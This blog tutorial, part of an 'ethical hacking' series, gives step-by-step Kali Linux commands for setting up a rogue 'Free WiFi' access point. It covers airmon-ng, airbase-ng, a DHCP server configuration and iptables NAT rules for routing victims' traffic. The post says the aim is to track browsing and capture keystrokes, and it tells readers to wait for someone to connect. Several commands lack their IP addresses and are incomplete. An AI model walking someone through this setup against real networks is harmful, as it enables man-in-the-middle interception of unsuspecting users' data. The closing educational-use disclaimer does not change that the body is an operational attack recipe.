Ethical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points
Ready to Start Your Career?

Ethical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points

bjacharya s profile image
By: bjacharya
April 7, 2016

Ethical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points - CybraryEthical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points

Got free WiFi in the airport? At college? In motels? Or anywhere else?... Before connecting, we must make sure the access points are really broadcasted bycompanies/offices/colleges themselves. Maybe the AP is fake (and not really associated with airport/college/motels). Someone might have created a fake AP, so they can track our browsing history, and capture our key strokes (for a MITM and a lot more). BEWARE ! ! ! This all is about ROGUE Wireless Access Points.

 Tools required:apt-get: to get new dhcp softwareairmon-ngairbase-ng: turns our kali to APdhcpd3: for adding dhcp server functionality. The fake AP process goes like this:1) Someone connects to fake AP, that we created2) With DHCP, we provide dynamically changing IP address to them.3) Similarly, we provide a default gateway, DNS. Let’s begin....Run:

apt-get update

apt-get upgrade

Let it finish, then run:

apt-get install dhcp3-server -y

(-y is simply yes for any prompts)

(Now, for safety. . .we move the default dhcp conf file to backup, so that we can access it next time if needed)Run:

mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup

(in case of wrong location above, search in Google for the location)

We're with an empty conf file. We must assign new things here, such as gateway, DNS...for the purpose of hand out to the user who connects to this fake AP. Let's assume we did as follows in our logical interface:Network : : : will create our specified wireless routing network.Let’s assume our n/w is at When user connects to the fake AP and wants to surf internet, he goes first from the specified content and then gets routed to original destination via our n/w at: Let's work in work in our text editor. You can choose your best one. I’ll use nano:Run:

nano /etc/dhcp3/dhcpd.conf

You'll get blank text editor of dhcpd.conf.Now, write following exactly:

ddns-update-style ad-hoc;default-lease-time 600;max-lease-time 7200;subnet netmask {option subnet-mask;option broadcast-address;option routers;option domain-name-servers;range;}


airmon-ng start wlan0

airodump-ng mon0

 Let's create new ESSID “Free WiFi":Run:

airbase-ng –essid “Free Wifi” -c 6 mon0

(The Channel is 6, as seen after airodump-ng mon0, but it may differ on your case.)Open new tab, or clone the session. Run:

ifconfig at0 up

Next, lets assign the IP to at0. Run:

ifconfig at0

 Let's route the Kali machine with our assigned GW. Run:

route add-net netmask gw

Start DHCP server service. Run:

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/ at0

/etc/init.d/dhcp3-server start


iptables –flushiptables –table nat –flushiptables –delete-chainiptables –table nat –delete-chainiptables –table nat –append POSTROUTING –out-interface eth0 -jMASQUERADEiptables –append FORWARD –in-interface at0 -j ACCEPTecho 1 > /proc/sys/net/ipv4/ip_forward

 Finally, wait and watch in the previous tab to see if someone's associated with Free WiFi or not. Enjoy!A quick note: This series is only for educational purpose. Practice this series in a lab, in a virtual/separate network and always avoid illegal activities. If you can, then support us in fighting the bad guys.
See the other posts in this series:Ethical Hacking with Kali Linux - Part 1: ObjectiveEthical Hacking with Kali Linux - Part 2: Finding Hidden SSIDSEthical Hacking with Kali Linux - Part 3: Bypassing Mac Address FilterEthical Hacking with Kali Linux - Part 4: Breaking WPA2 WirelessEthical Hacking with Kali Linux – Part 6: Nmap (Network Mapper)By : Bijay Acharya Follow me :
Schedule Demo
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry